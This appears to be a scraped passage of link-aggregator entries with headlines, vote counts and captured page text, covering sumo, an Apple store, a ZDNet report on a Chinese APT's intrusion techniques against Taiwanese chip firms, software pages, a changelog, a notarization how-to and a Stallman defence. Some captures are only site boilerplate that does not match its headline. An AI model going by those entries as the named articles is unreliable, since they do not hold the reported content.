sumo, with the exception that the wrestlers wear leotards under a mawashi, and the matches last three minutes instead of five minutes like the ones in professional sumo. [9] Notable female sumo wrestlers Hiyori Kon Miki Satoyama Sharran Alexander Julia Dorny Hetal Dave Edyta Witkowska Seika Izawa Epp Mäe Anna Zhigalova Vera Koval Svitlana Iaromka Sandra Köppen Maryna Pryshchepa Yonamine Chiru Françoise Harteveld ^ ^ a b i (2010, Dennis J. Frost; ISBN 978-0674056107), p. 48. ^ ^ ^ ^ ^ ^ ^
24
Apple Marina Bay Sands Opens Thursday in Singapore
PRESS RELEASESeptember 7, 2020 Apple Marina Bay Sands opens Thursday in Singapore Apple’s most ambitious retail project sits on the waters of Marina Bay p Singapore — Apple today previewed Apple Marina Bay Sands, the first Apple Store to sit directly on the water. Appearing as a sphere floating on the iridescent Marina Bay, the store introduces a new and captivating retail experience at one of the most iconic locations in Singapore. Entirely surrounded by water, Apple Marina Bay Sands offers uninterrupted 360-degree panoramic views of the city and its spectacular skyline. The sphere is a first-of-its-kind, all-glass dome structure that is fully self-supported, comprised of 114 pieces of glass with only 10 narrow vertical mullions for structural connection. As Apple’s third retail location in Singapore, the new store creates an unforgettable space for customers. p Inspired by the Pantheon in Rome, an oculus located at the apex of the dome provides a flooding ray of light that travels through the space. The interior of the glass is lined with custom baffles, each uniquely shaped to counter sun angles and provide a nighttime lighting effect. With trees lining the interior of the dome, the green garden city of Singapore flows into the store, providing additional shading and soft shadows through the foliage. “We couldn’t be more excited to open the breathtaking Apple Marina Bay Sands in Singapore, building on our commitment to this special place that began more than 40 years ago,” said Deirdre O’Brien, Apple’s senior vice president of Retail + People. “Our passionate and talented team is ready to welcome this community to our new store and deliver the care and support that our customers around the world love.” p Visitors entering the store encounter a dramatic reveal into the massive volume of the dome, where they can explore curated Apple products and accessories, receive personal technical support from Geniuses, or simply take in the stunning view of Marina Bay. The Forum is centered around a Video Wall, which will serve as the stage for Today at Apple sessions featuring Singapore’s artists, musicians, and creators. Entrepreneurs and developers interested in receiving training and advice can meet with Apple team members in Apple’s first underwater Boardroom, located on the lower level of the store. p p Apple’s rich history in Singapore spans more than 40 years, beginning with the first corporate office in Ang Mo Kio. In 1981, the team was responsible for producing the majority of printed circuit boards for Apple II computers worldwide. Since then, Apple has expanded its corporate and retail presence, and now supports over 55,000 jobs across the entire Apple ecosystem. The 148-person team at Apple Marina Bay Sands, who collectively speak over 23 languages, will welcome visitors for the first time on Thursday, September 10 at 10 a.m. SGT. The store will implement the same rigorous health measures for both employees and visitors seen across all Apple Store locations, including a mask requirement, temperature checks, and social distancing. To ensure the health and well-being of guests, visits to Apple Marina Bay Sands on Thursday will be by appointment only. Customers can visit apple.com/sg/marinabaysands to choose from available times, and each non-transferable reservation admits one person. Capacity will be limited, so guests may experience wait times before entering the store. p Share article Images of Apple Marina Bay Sands Download all images
2
Black Hat: Hackers are using skeleton keys to target chip vendors
Targeted attacks against semiconductor companies in Taiwan may not be well-known, but this does not mean the ripple effect of a successful hack would not be felt worldwide. Black Hat USA CISA to partner with Amazon, Google, Microsoft, Verizon, AT&T and more for cyberdefense initiative Enterprise players face 'one-two-punch' extortion in ransomware attacks How cybersecurity incidents can become legal minefields There's been a rise in stalkerware. And the tech abuse problem goes beyond smartphones This is how a naive NSA staffer helped build an offensive UAE security branch IoT mischief takes neighborly revenge to the next level in a capsule hotel Security researchers warn of vulnerabilities in hospital pneumatic tube systems Over the past decade, Taiwan has slowly established itself as a hotbed for chip companies in both development and production. Taiwan Semiconductor Manufacturing Company (TSMC) is a major player in the field and over time, the market value of the overall semiconductor and equipment manufacturing sector in the country has increased. The technology industry is a top target for advanced persistent threat (APT) groups, given the often-lucrative and valuable intellectual property -- as well as customer data -- that companies in the sector guard. At Black Hat USA on Thursday, CyCraft Technology researchers Chung-Kuan Chen and Inndy Lin described a set of attacks believed to have been conducted by the same Chinese APT group in the quest for semiconductor designs, source code, software development kits (SDKs), and other proprietary information. "If such documents are successfully stolen, the impact can be devastating," the researchers said. "The motive behind these attacks likely stems from competitors or even countries seeking to gain a competitive advantage over rivals." According to the team, attacks have been launched on numerous semiconductor vendors located at the Hsinchu Science Industrial Park in Taiwan. To date, it is thought at least seven vendors -- as well as their subsidiaries -- have been attacked by the same APT group in what the team calls "precise and well-coordinated attacks." See also:  Cybersecurity 101: Protect your privacy from hackers, spies, and the government Dubbed Operation Chimera, also known as Skeleton, the APT launched a series of attacks throughout 2018 and 2019 with a variety of tools, including Cobalt Strike -- a legitimate penetration testing tool that threat actors are known to abuse -- and a custom skeleton key derived from code ripped from both Dumpert and Mimikatz. In two case studies described in CyCraft's whitepaper (.PDF), a variety of endpoints and user accounts were found to be compromised at the time malware infections were detected. Initial access came from a valid, corporate ID -- potentially stolen in a separate data breach -- and a virtual private network (VPN) connection in the first case. "Many enterprises often neglect this attack vector, by default trusting VPN connections and welcoming them into their intranet; and Chimera is one of the most skilled threat actors that we have seen at abusing VPN policies," the researchers added. In the following stage of the attack chain, a remote desktop protocol (RDP) was used to gain access to company servers. During the second Chimera attack, abnormalities were discovered during a network upgrade in which the malware payload was directly injected into system memory, made possible through encoded PowerShell scripts. Once loaded into a compromised network, an adapted version of Cobalt Strike masqueraded as a Google Update function (GoogleUpdate.exe), while actually establishing backdoor beacons and persistence mechanisms. To exfiltrate data from an infected machine, Chimera makes use of an old version of RAR, a legitimate archive program, which has also been tampered with for malicious purposes. The customized tool, dubbed ChimeRAR, archives data harvested from a network and transfers it to a command-and-control (C2) server controlled by the cyberattackers. To further mask its activity, the threat group also hosted multiple C2s in the Google Cloud platform and through Microsoft Azure, as well as via other public cloud services. CNET:  The best home security camera of 2020 The skeleton key, however, is perhaps the most interesting weapon in Chimera's arsenal. Dell Secureworks' Counter Threat Unit first documented the use of a skeleton key able to bypass authentication checks on Active Directory (AD) servers back in 2015, giving cybercriminals unfettered access to remote access services. Chimera's tool, named "SkeletonKeyInjector," is designed to be implanted into AD and domain controller (DC) servers, allowing the cyberattackers to move laterally across a network and to make direct syscalls, thereby circumventing existing security software. Code snippets taken from Mimikatz and Dumpert give the malware the capability to bypass API monitoring, a common defense mechanism used by today's antivirus and endpoint protection solutions. TechRepublic:  Security analysts: Industry has not solved the talent gap or provided clear career paths "The malware altered the New Technology LAN Manager (NTLM) authentication program and implanted a skeleton key to allow the attackers to log in without the need of valid credential[s]," the researchers said. "Once the code in memory was altered, the attackers could still gain access to compromised machines even after resetting passwords." The team adds that as AD machines rarely receive a reboot, this could mean skeleton keys could go undetected for long periods, and also facilitate the threat actors' wishes to move laterally across networks without detection. In one of the firm's case studies, the APT group was present for roughly a year before being removed from the compromised network. "Based on the stolen data, we infer that the actor's goal was to harvest company trade secrets," CyCraft says. "The motive may be related to business competition or a country's industrial strategy." ZDNet has reached out to the researchers with additional queries and will update when we hear back. The biggest hacks, data breaches of 2020 (so far) Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0
5
Show HN: PolyGit, a Simple iOS Git Client
Update yourrepositories fromanywhere Git can be complicated PolyGit makes it understandable Designed for simplicity and ease of use. Your entire commit history is accessible with just a few taps. Git has never been easier than this. Commit Graph Visualize the connections between your commits, branches and tags. Get a deeper understanding of your repository by viewing the Directed Acyclic Graph underpining Git. Stage and Push Changes Make quick updates on the go and push commits in seconds. Stage, unstage and discard hunks with an intuitive UI. Effortless Text Editing Syntax highlighting for more than 75 languages makes editing code a breeze. Keyboard shortcuts accelerate common actions like indenting and selecting lines. Merge, Rebase, Cherry-pick & More Modify your repository with confidence. Git's powerful commands are here with detailed previews so you always make the right changes. Additional Features Markdown and HTML Previews View live previews of your documents in PolyGit or Safari. Merge Tool Use the built in merge tool to resolve merge conflicts with a simple tap. Find and Replace Find all instances of a string and incrementally replace instances of that text. GitHub, GitLab and Bitbucket Integration Sign in with your Git provider to view all your repositories and easily clone them. Horizontal and Vertical Scrolling Set the 'Column Wrap Width' in Settings to disable line wrapping and scroll horizontally through your files. FAQ How can I authenticate if I have 2-factor auth enabled? You will need to generate a personal access token on GitHub, an app password on BitBucket, or a personal access token on GitLab and use that to authenticate. See here for more information. How can I authenticate using SSH? You will need to export the app's SSH Key and add it to your Git provider. You can copy the key by navigating to Settings and then Credentials. Select 'Export Public Key' and then 'Copy Key'. See here for more information.
4
A free, open-source, and completely encrypted notes app
Stand for privacy. Write fearlessly. Standard Notes helps you gain control in a world that often feels out of control. Protect your life's work with end-to-end encryption, advanced security, and unmatched privacy controls. A steel vault for your most sensitive data. Standard Notes protects your notes and files with, meaning only you have access to the keys required to decrypt your information. 4x-audited industry-leading end-to-end encryption Safely store all your sensitive data in one place and access it from all your devices, resting assured that your data is always protected by the highest security standards. Explore our features Write fearlessly. Note-taking services like Evernote, Google Keep, Notion, and Simplenote cannot prevent employees and governments from reading your data. Standard Notes features advanced security measures and privacy controls that protect your data against hacks, data breaches, government access, and even employee access. Read how we protect your data Your notes and files, always. Never worry about losing your data again. You'll always have an offline copy of your data, so you can access your notes and files even without an internet connection. Automated backups and secure cloud sync ensure that your data is safe and sound, even if your device is lost, damaged, or stolen. View our plans Take back your data. Shape-shifting privacy policies and unauthorized access by #BigTech and other non-encrypted services can lead to leaks, doxing, financial fraud, identity theft, loss of control over your information, and other existential harms to you or your business. Safeguard your private data with zero-knowledge encryption and audited, open-source applications by Standard Notes. Read our security audits Download Standard Notes Unlimited notes, unlimited devices, all for free. iOS Want more? Learn about our plans Who is Standard Notes? We’re an independent company founded on an ethos of software sustainability and ethical data practices. Our code is completely open-source and independently audited by leading security researchers. 100% Revenue from paying users $0 In venture capital 7 years In service Read our longevity statement
171
Vivaldi Browser 5.0
Get all of the highlights and details of this release by visiting the blog. • [New][Themes] Theme sharing (VB-38363) • [New][Translate][Panel] Provide a new way to translate selections and arbitrary text (VB-80593) • [New][Address bar][Download] Offer additional way of showing downloads (VB-80226) • [New][Page Actions][Chain Commands][Keyboard][Gestures] Handle page actions as commands (VB-82950) • [New][Chain Commands] Add parameter to search with selection command: to specify search engine (VB-81860) • [New][Linux]Provide rpm packages for ARM and ARM64 (VB-84132) • [Address bar] Checking a URL with a search engine goes to URL instead of searching (VB-84115) • [Address bar] URL in address field not updated after opening a site from Bookmarks menu (VB-83568) • [Address bar] URLs with encoded characters are not properly encoded when copying the URL (VB-77574) • [Blocker][Keyboard] Tracker blocking badge is not keyboard accessible (VB-65331) • [Bookmarks] Duplicate text overlaid on javascript and mailto URLs (VB-81608) • [Capture] Button not translated (VB-84477) • [Capture] Dragging isn’t possible after screenshot (VB-84242) • [Capture] Missing UI for screenshot of area (VB-83510) • [Chromium] Upgraded to 96.0.4664.51 • [Download] Doesn’t finish although it reach 100% (VB-83809) • [Download] Data blob download fails (VB-84157) • [Gestures][Keyboard] Translate Page Not Available as a Command (VB-82214) • [Gestures][Settings] Animation not displaying (VB-82288) • [Linux][Media] Update proprietary codecs to 98.0.4710.4—104707 • [Locale] Swedish system long date format incorrect (VB-73701) • [Menus] Improve capability to recover from broken syntax in menu files (VB-84124) • [Menus][PWA][Speed Dials] Useless “Create shortcut…” context menu item (VB-83236) • [Panels] Can’t open “windows with N tabs” in window panel (VB-83590) • [Panels][Download] Missing information if disk is full (VB-77323) • [Panels][Download] Order of entries in download panel change on click after download finished (VB-69518) • [Panels][Tabs] Sort tabs by domain has stopped working (VB-84492) • [Performance] Enable backward/forward cache by default (VB-83644) • [Performance][Address bar] Improve performance by doing less re-rendering (VB-83559) • [Performance][Tabs] Fewer avoidable re-renders while dragging tabs (VB-83498) • [Periodic reload][Tabs] Only affects last selected tab in a group of tabs (VB-84439) • [Privacy] Add .gitignore file to profile folder; A warning should display if the profile might be in a Git repository (VB-84485) • [Quick Commands] Should take history state into account with autocomplete (VB-83489) • [Quick Commands] Tune history search (VB-82876) • [Reader Mode] Failing in some cases when it should not (VB-83689) • [Speed Dial] Cannot rename bookmark by clicking on the title; cut/copy/paste in the title field doesn’t work (VB-81991) • [Speed Dial] Opening a page from a folder, then going back does not return you to the folder (VB-84101) • [Speed Dial][Search] Ask users to consider using Startpage instead of Google (VB-73553) • [Sync] Can’t use $ in password (VB-83806) • [Tabs] Dragging should update less when animations are off (VB-83757) • [Tabs] Dragging tab selects another tab (VB-83758) • [Tabs] When tab bar is hidden, a new tab from a stack opens outside the stack (VB-79128) • [Tabs][Keyboard] F6 focus selection disappears on tab stacks (VB-83959) • [Tabs][Performance] Poor performance with many tabs (VB-84121) • [Translate] Better error handling to improve automatic detection (VB-84434) • [Translate] Error in console when loading XML file (VB-83681) • [Translate] Selection button and popup might end up below the page (VB-83429) • [Windows][Media] Sound occasionally fails: fixes some of these instances (VB-82763) • [Calendar Beta] Add option to not show notifications (VB-84425) • [Calendar Beta] Allow selecting which calendars to sync on account setup (VB-84584) • [Calendar Beta] Assign or allow keyboard shortcut to refresh Calendar (VB-74323) • [Calendar Beta] Cannot connect to NextCloud CalDAV (VB-74906) • [Calendar Beta] Changing the color of local Calendar does not work (VB-83986) • [Calendar Beta] Deleting Vivaldi Calendar account hangs (VB-84030) • [Calendar Beta] Duplicate event created when using done button (VB-84384) • [Calendar Beta] Empty event with default notification is saved (VB-83664) • [Calendar Beta] Filter does not apply for tasks in agenda view (VB-83455) • [Calendar Beta] Hide “+” when editing event (VB-64642) • [Calendar Beta] Import iCal file into new Calendar (VB-84031) • [Calendar Beta] Imported ICS calendar containing events with no range doesn’t sync (VB-82935) • [Calendar Beta] Prevent update of web calendar from invite email (VB-84178) • [Calendar Beta] Setting for opening ICS files in Vivaldi or use OS default app (VB-56573) • [Calendar Beta] Setting up CalDAV or Google calendar is slow with many events (VB-83847) • [Calendar Beta] Status button shows events from hidden calendars (VB-84459) • [Calendar Beta] Store and use credentials when accessing Web Calendar (VB-83462) • [Calendar Beta] Web calendar event duplication (VB-84051) • [Calendar Beta][CalDAV] Changing calendar color does not work for online Calendars (VB-84001) • [Calendar Beta][Keyboard] Define command for shortcuts compatible with Google calendar: allows for shortcuts to be different between Browser, Calendar and Mail (VB-83320) • [Calendar Beta][Mail Beta] Error logger improvements (VB-84064) • [Calendar Beta][Mail Beta] Status button logs overflow (VB-84454) • [Calendar Beta][Panel] Creating a new event for today in the panel fails (VB-83808) • [Feeds Beta] Add feed dialog should allow adding an incomplete feed (VB-84424) • [Feeds Beta] Quirksmode feed causes several parsing issues (VB-83459) • [Feeds Beta] When parsing of a feed fails, it halts loading of all remaining feeds (VB-83819) • [Mail Beta][Calendar Beta] Add logs to status popup (VB-84024) • [Mail Beta] Add Oauth support for Office365/Outlook (VB-83729) • [Mail Beta] Add back threading toggle button (VB-84028) • [Mail Beta] Add “Rename Mailing List” to context menu (VB-83175) • [Mail Beta] Deleting from All Messages not working (VB-82670) • [Mail Beta] IMAP account setting for upload to Sent folder or not (VB-70666) • [Mail Beta] Implement new import UI: work in progress (VB-83982) • [Mail Beta] Import from M2 does not always put sent messages in sent folder (VB-83540) • [Mail Beta] Import – allow selecting accounts to include (VB-84133) • [Mail Beta] Inbox navigates to composer after closing a composer tab (VB-84412) • [Mail Beta] Links can get linkified incorrectly (VB-84003) • [Mail Beta] Mail list sorting (VB-28216) • [Mail Beta] Mail status popup fails for BCC-messages (VB-83623) • [Mail Beta] Messages sent to self don’t show in ‘received’ (VB-74552) • [Mail Beta] No result when putting symbols in search without quotation (VB-81236) • [Mail Beta] POP errors are too generic (VB-83516) • [Mail Beta] Performance fix for getting next filtering request • [Mail Beta] Retries too fast on failed connection (VB-83961) • [Mail Beta] Search does not find emails with txt attachments (VB-75874) • [Mail Beta] Some text in email is rendered in pure white color (VB-83925) • [Mail Beta] Support actions for filters: first actions are mark read, add/remove label (VB-79165) • [Mail Beta] Temporarily out of sync with server (VB-83577) • [Mail Beta] Undo fails at times (VB-64787) • [Mail Beta] Unnecessary confirm delete dialogs (VB-84118) • [Mail Beta] Wrong hover color on dropdown toolbar buttons (VB-84409) • [Mail Beta][Settings] Deleted mailing list filters can never be restored, with settings open in a new window (VB-84625)
2
The original anti-vaxxers: Edward Jenner contributed to today’s culture wars
The Economist The Economist Skip to content
1
Microsoft trained AI to find software bugs using hide-and-seek
[News] Microsoft researchers: We've trained AI to find software bugs using hide-and-seek (zdnet.com) submitted by
3
Sidekiq NV100: Embeddable SDR and GPS M.2 formatted module for wideband wireless
Sidekiq™ NV100 Embeddable M.2 2280 SDR + integrated pre-select filters and GPS Dev Kit Volume Orders Exceptional RF Tuning, Fidelity and Instantaneous Dynamic Range in a Tiny SDR Compatible with millions of computer systems Sidekiq NV100 is a highly flexible RF powerhouse optimized to tackle your most challenging signal environments. It combines the Sidekiq  Family's state-of-the-art wideband RF processing capabilities with an integrated GPS clock and flexible Rx pre-select filtering, all in a common form factor with wide compatibility out of the box. RF Tuning Range 30 MHz to 6 GHz(RF access down to 10 MHz) RF Bandwidth Up to 50 MHz per channel Power Consumption 4-6W (typical usage) Integrated FPGA Xilinx Artix 7 XC7A50T FPGA with x2 Gen2 PCIe interface Form Factor M.2 2280 Key B + M (22 mm x 80 mm x 4.5 mm) I/O PCIe Gen2 x2 (5 Gbps) + GPIO RF Modes of Operation 2 Rx, 2 Tx, or 1 Tx + 1 Rx GPS Integrated GPSDO receiver with PPS Filtering Sub-octave Rx pre-selection from 400MHz to 6GHz Download Datasheet Widely Compatible M.2 2280 Form Factor Based on Analog Devices’ ADRV9004, a wideband transceiver RFIC that delivers extended RF tuning capabilities as well as exceptional RF fidelity and instantaneous dynamic range, Sidekiq NV100 packs RF flexibility into the tiny M.2 2280 form factor, commonly utilized for solid state hard drives that support NVMe® in laptops, tablets, and other computing platforms. A Common Form Factor Because Sidekiq NV100 comes in the M.2 2280 form factor -commonly found on the motherboards of laptops and tablets for adding fast NVMeSSDs - high performance off-the-shelf host platforms are easy to find,source, and integrate with an SDR running your RF application. Use as a Thunderbolt™ 3 Peripheral With our Thunderbolt™ 3 Housing The Sidekiq NV100 is also available in a Thunderbolt 3 carrier with a small enclosure (providing SMA ports for RF, and a Thunderbolt 3 compatible USB-C connector for both power and connectivity to the host). Use as a Compact RF Platform With our Intel® NUC Development Kit Looking for a Compact High Performance Compute Platform with an Integrated Sidekiq NV100? To support customers that are looking for a complete SDR + high performance computer solution in a small for factor, Epiq Solutions offers Sidekiq NV100 pre-integrated into an Intel NUC computer. For more information on the NUC + NV100 offering, contact us. Intel Core i7 quad-core x86 CPU NUC I/O includes USB3, gigabit ethernet, Thunderbolt™3, and HDMI Extended chassis to provide access to Rx/Tx/GPS antenna ports, as well as 10 MHz input and PPS input 16 GB RAM 1 TB SSD (2.5”) Pre-loaded with Ubuntu Linux (18.04) Sidekiq NV100 JTAG and GPIO access Integrated Features To simplify your product development Integrated GPS Sidekiq NV100 includes an integrated GPS receiver + GPSdisciplined oscillator (GPSDO) for for excellent long-term positioning accuracy.It also includes a 40 MHz output that can be passed to another Sidekiq. Integrated Pre-Select Filters If you need a receiver that enables optimum interference protection, Sidekiq NV100 is for you. The sub-octave Rx pre-select filtering provides out-of-band interference protection on both RF receiver paths from 400 MHz to 6 GHz. While other solutions need to connect to a bulky, external filtering mechanism, Sidekiq NV100 incorporates this filtering into its small, standard M.2 2280 form factor, allowing you to either save space and reduce your product size, or free up space to accommodate other technology needs. Ready to Develop We have tools to help get you started LOADED LINUX NUC One Intel® NUC running Ubuntu, with one Sidekiq NV100 card pre-installed SOFTWARE API An easy-to-use interface for configuring the RF transceivers and streaming data between the host and Sidekiq NV100 over the PCIe interface PRE-LOADED APPS PC-based spectrum analyzer (ERA) and libsidekiq Linux software library pre-loaded on the NUC JTAG FIXTURE One JTAG fixture with an additional Sidekiq NV100 and Thunderbolt™3 cable FPGA REFERENCE Sidekiq NV100 FPGA reference design source code to enable user-customized FPGA designs 1 YEAR OF SUPPORT One year warranty, software updates and web-based support Talk to an Expert
1
Upload Multiple Images to a Model with Django
Member-only story Juli Colombo p Follow Published in Ibisdev p 5 min read p Aug 20, 2020 -- 10 Share Get flexibility without having several image fields Very often in projects, especially in ecommerces, the client wants to link an image to a product. Way too much time has passed by for me to learn that most of the time the requirement changes in the middle of the project: the client has to be able to upload more than one image to a merchandise. And not only that, the amount of images… Follow 242 Followers p Writer for Ibisdev Software Engineer in www.julietacolombo.com Follow Help Status Writers Blog Careers Privacy Terms About Text to speech Teams
1
Fortune Telling Businesses Booming During Covid-19 Pandemic
More scattered showers, storms round out the warm weekend An early round of storms building from West Texas could carry over Sunday afternoon and evening 3H ago National Cancer Survivors Day time for reflection, celebration of life Sunday is National Cancer Survivors Day – a day to honor and celebrate the more than 18 million cancer survivors in the U.S. 9H ago Strawberry moon rising: Celestial treat sweetens night sky Around the world, people can catch a sweet treat in the night sky this weekend. Jun 2 'Kindness' joins Winnie the Pooh in new children's book about school violence A new character called "Kindness" joins lovable Winnie the Pooh in a new children's book touching on the topic of school violence. 11H ago Texas fails to pass bill improving financial protections for domestic violence survivors Even after leaving an abusive relationship, many domestic violence survivors are strapped with debt caused by their abuser. Jun 2 Gray wins 5th start in row, Semien 21-game hit streak as Rangers beat M's 2-0 Jon Gray pitched two-hit ball over seven innings to win his fifth consecutive start, Marcus Semien scored the game's first run after extending his MLB-best hitting streak to 21 games and the AL West-leading Texas Rangers beat the Seattle Mariners 2-0. Jun 2 WB I-20 to remain closed after fatal car crash Two people have died after crashing their vehicles into each other. Jun 2 Dallas Cowboys top Forbes' list of most profitable sports teams; Mavericks ranked No. 16 For the third year in a row, America's Team has topped Forbes' list​ of most profitable sports teams, raking in $1.171 billion. Jun 2 Trump lawyers told DOJ they couldn't find classified doc discussed in audio The recording — from a July 2021 meeting at Trump's golf club in Bedminster, New Jersey — is a crucial piece of evidence that prosecutors obtained in recent months. Jun 2
1
Easily search a library of factual claims and their sources
òtító Tools to crowdsource facts and fight misinformation reviews 0 Do you use òtító? What is òtító? òtító is the new media format that empowers us all to crowdsource and moderate factual information. It includes checks and balances, and software tools to incentivise healthy behaviours, and discourage unhealthy or adversarial approaches to discourse. Recent launches òtító òtító is the new media format that empowers us all to crowdsource and moderate factual information. It includes checks and balances, and software tools to incentivise healthy behaviours, and discourage unhealthy or adversarial approaches to discourse. 3yr ago
1
What exactly is the difference bw Deployments and StatefulSets
Your browser isn’t supported anymore. Update it to get the best YouTube experience and our latest features. Learn more
1
Selecting iTunes Provider for Notarization
When uploading your package for notarization, altool could fail with the following error message: Error: Your Apple ID account is attached to other iTunes providers. You will need to specify which provider you intend to submit content to by using the -itc_provider command. Please contact us if you have questions or need help. (1627) This usually happpens if you use your Apple ID for uploading something else than software. Examples are books (for Apple Books) and music (for Apple Music and/or iTunes Store). In this case, you would need to specify which provider name are you using. These provider names are unique, dependent on the account and which store that it is for. That is, Apple will create one string for the entity that uploads stuff to the App Store and another string for the Apple Books store. If you sign up to the stores as a natural person (instead of an organization), these strings woould be derived from your legal name and be unique to your account. Since you’re using altool, you’ll want to use the provider name associated with the App Store. Even though your intention of notarization is for Developer ID distribution outside the App Store. Confused? Read on and you’ll be notarizing your binaries in no time. I’ll show you how to get all provider names associated with your account and select which one to use to continue with notarization. Be sure to have these on-hand, which you probably have since you’re already using altool. You can get the list of provider names attached to your account by running iTMSTransporter from the command-line. This is a Java program embedded in Xcode which it uses internally for uploading to the App Store. Apparently this program is also used for media labels to upload music and videos to Apple. /Applications/Xcode.app/Contents/Developer/usr/bin/iTMSTransporter -m provider -u "your.name@example.com" -p "app-specific-password" Be sure to replace your Apple ID and your app-specific password as appropriate. The command  would return a listing like the following: - Long Name - - Short Name -1 Your Name YourName2 Your Name|123456789 YourName123456789 What you want is to pick out the short name listed and use it as a parameter to altool for specifying the provider name. Follow these steps to select the right provider name Finally add the provider name as a parameter to altool. Despite what the error message said, the parameter to specify the provider name is --asc-provider, not -itc_provider. Probably because altool is a wrapper for the Java-based iTMSTransporter and the two development groups haven’t gotten around to synchronize the error message to the parameter. Run a command like the following to notarize your bundle. Notice the new argument --asc-provider which has the the provider short name as its parameter. xcrun altool --notarize-app --primary-bundle-id com.example.YourApp -u "your.name@example.com" -p "app-specific-password" --asc-provider "ProviderName123456789" --file YourAppBundleCompressed.zip Remember to replace the parameters like bundle identifier and Apple ID credentials as appropriate. Also note that altool takes a single file as an argument, hence you’ll need to zip your bundle or enclose it in a disk image.
1
Watch how a paper can cut the scissors
Your browser isn’t supported anymore. Update it to get the best YouTube experience and our latest features. Learn more
51
Nadine Strossen and Hannah Wolfman-Jones Rebut Accusations Against Stallman
Published on April 05, 2021. Hannah Wolfman-Jones [*] had already chosen Stallman as a coauthor when the call for his cancellation broke up in September 2019. Confronted with a dilemma, Hannah sought the advice of coauthor Nadine Strossen [**] . Here are her thoughts and the response she received from Nadine, extracted verbatim with their permission from the original (Archived) -- worth reading. by Hannah Wolfman-Jones - May 11, 2020 As someone who had recently become an associate of thought-criminal Richard Stallman, I would be lying if I said this guilt-by-association didn’t give me pause. The idea of my name being smeared all over the internet by a mob of strangers is not particularly appealing. It’s the type of thing that makes one not want to speak up at all: a real chilling effect. Hannah Wolfman-Jones The task ahead of me was a difficult one. See, I had already recruited Stallman to be part of the We The Web L3C experiment in collaboration that is the book . So now, like MIT and the Free Software Foundation I had to make a decision: do I keep him on the project or boot him? Luckily, another co-author on the book has spent a lot of time pondering inclusion, women’s rights, children’s rights, and free speech. Her name is Nadine Strossen and her credentials run deep. She served as the first female President of the American Civil Liberties Union (ACLU), America’s largest and oldest civil liberties nonprofit, from 1991 to 2008. When she stepped down as President, three Supreme Court Justices participated in her farewell luncheon (Ruth Bader Ginsburg, Antonin Scalia, and David Souter). Strossen is a Professor Emeritus at New York Law School and currently an advisor to the EPIC (Electronic Privacy Information Center), FIRE (Foundation for Individual Rights in Education), the ACLU, and Heterodox Academy. She is the author of the widely acclaimed books (2018) and (1995). She has far too many awards, publications, and prominent appearances to name. I talked with her to explain the dilemma and get her thoughts. by Nadine Strossen - May 11, 2020 I find it so odd that the strong zeal for revenge and punishment if someone says anything that is perceived to be sexist or racist or discriminatory comes from liberals and progressives! There are so many violations [in cases like Stallman’s] of such fundamental principles to which progressives and liberals cling in general as to what is justice, what is fairness, what is due process. One is proportionality: that the punishment should be proportional to the offense. Another one is restorative justice: that rather than retribution and punishment, we should seek to have the person constructively come to understand, repent, and make amends for an infraction. Liberals generally believe society to be too punitive, too harsh, not forgiving enough. They are certainly against the death penalty and other harsh punishments even for the most violent, the mass murderers. Progressives are right now advocating for the release of criminals, even murderers. To then have exactly the opposite attitude towards something that certainly is not committing physical violence against somebody, I don’t understand the double standard! Nadine Strossen Another cardinal principle is we shouldn’t have any guilt by association! [To hold culpable] these board members who were affiliated with him and ostensibly didn’t do enough to punish him for things that he said—which by the way were completely separate from the Free Software Foundation—is multiplying the problems of unwarranted punishment. It extends the punishment where the argument for responsibility and culpability becomes thinner and thinner to the vanishing point! That is also going to have an enormous adverse impact on the freedom of association, which is an important right protected in the U.S. by the First Amendment. The Supreme Court has upheld freedom of association in cases involving organizations that were at the time highly controversial. It started with NAACP (National Association for the Advancement of Colored People) during the civil rights movement in the 1950s and 60s, but we have a case that’s going to the Supreme Court right now regarding Black Lives Matter. The Supreme Court says even if one member of the group does commit a crime—in both of those cases physical violence and assault—that is not a justification for punishing other members of the group unless they specifically intended to participate in the particular punishable conduct. Now, let’s assume for the sake of argument, Stallman had an attitude that was objectively described as discriminatory on the basis on race and gender (and by the way I have seen nothing to indicate that), that he’s an unrepentant misogynist, who really believes women are inferior. We are not going to correct those ideas, to enlighten him towards rejecting them and deciding to treat women as equals through a punitive approach! The only approach that could possibly work is an educational one! Engaging in speech, dialogue, discussion and leading him to re-examine his own ideas. Even if I strongly disagree with a position or an idea, an expression of an idea, advocacy of an idea, and even if the vast majority of the public disagrees with the idea and finds it offensive, that is not a justification for suppressing the idea. And it’s not a justification for taking away the equal rights of the person who espouses that idea including the right to continue holding a tenured position or other prominent position for which that person is qualified. But a number of the ideas for which Richard Stallman has been attacked and punished are ideas that I as a feminist advocate of human rights find completely correct and positive from the perspective of women’s equality and dignity! So for example, when he talks about the misuse and over use and flawed use of the term sexual assault, I completely agree with that critique! People are indiscriminantly using that term or synonyms to describe everything from the most appaulling violent abuse of helpless vulnerable victims (such as a rape of a minor) to any conduct or expression in the realm of gender or sexuality that they find unpleasant or disagreeable. #strossen-rms-ideas So we see the term sexual assault and sexual harrassment used for example, when a guy asks a woman out on a date and she doesn’t find that an appealing invitation. Maybe he used poor judgement in asking her out, maybe he didn’t, but in any case that is NOT sexual assault or harassment. To call it that is to really demean the huge horror and violence and predation that does exist when you are talking about violent sexual assault. People use the term sexual assault / sexual harassment to refer to any comment about gender or sexuality issues that they disagree with or a joke that might not be in the best taste, again is that to be commended? No! But to condemn it and equate it with a violent sexual assault again is really denying and demeaning the actual suffering that people who are victims of sexual assault endure. It trivializes the serious infractions that are committed by people like Jeffrey Epstein and Harvey Weinstein. So that is one point that he made that I think is very important that I strongly agree with. #not-sexual-assault Secondly and relatedly, [Richard Stallman] never said that he endorse child pornography, which by definition the United States Supreme Court has defined it multiple times is the sexual exploitation of an actual minor. Coerced, forced, sexual activity by that minor, with that minor that happens to be filmed or photographed. That is the definition of child pornography. He never defends that! What the point he makes, a very important one, which the U.S. Supreme Court has also made, is mainly that we overuse and distort the term child pornography to refer to any depiction of any minor in any context that is even vaguely sexual. So some people have not only denounced as child pornography but prosecuted and jailed loving devoted parents who committed the crime of taking a nude or semi-nude picture of their own child in a bathtub or their own child in a bathing suit. Again it is the hysteria that has totally refused to draw an absolutely critical distinction between actual violence and abuse, which is criminal and should be criminal, to any potentially sexual depiction of a minor. And I say potentially because I think if you look at a picture a parent has taken of a child in a bathtub and you see that as sexual, then I’d say there’s something in your perspective that might be questioned or challenged! But don’t foist that upon the parent who is lovingly documenting their beloved child's life and activities 